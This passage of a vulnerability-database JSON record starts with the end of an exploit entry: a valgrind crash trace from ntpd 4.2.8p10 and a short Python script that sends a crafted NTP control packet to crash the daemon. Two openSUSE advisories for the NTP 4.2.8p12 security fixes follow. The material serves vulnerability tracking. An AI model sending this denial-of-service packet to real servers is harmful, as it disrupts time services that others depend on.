/home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \r\n#==50079==\r\n \r\n#!/usr/bin/env python\r\n \r\nimport sys\r\nimport socket\r\n \r\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\r\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\r\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\r\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\r\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(buf, ('127.0.0.1', 123))\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31596"}], "suse": [{"lastseen": "2018-10-25T20:31:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "NTP was updated to 4.2.8p12 (bsc#1111853):\n\n - CVE-2018-12327: Fixed stack buffer overflow in the openhost()\n command-line call of NTPQ/NTPDC. 
(bsc#1098531)\n - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral\n association time spoofing additional protection (bsc#1083424)\n\n Please also see\n https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/ for\n more information.\n\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-10-25T18:21:54", "published": "2018-10-25T18:21:54", "id": "OPENSUSE-SU-2018:3452-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00069.html", "title": "Security update for ntp (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-25T20:31:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "This update for NTP to version 4.2.8p12 fixes the following\n vulnerabilities (bsc#1111853):\n\n - CVE-2018-12327: Fixed stack buffer overflow in the openhost()\n command-line call of NTPQ/NTPDC. (bsc#1098531)\n - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral\n association time spoofing additional protection (bsc#1083424)\n\n Please also see\n https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/ for\n more information.\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "edition": 1, "modified": "2018-10-25T18:10:27", "published": "2018-10-25T18:10:27", "id": "OPENSUSE-SU-2018:3438-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00064.html", "title": "Security update for ntp (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}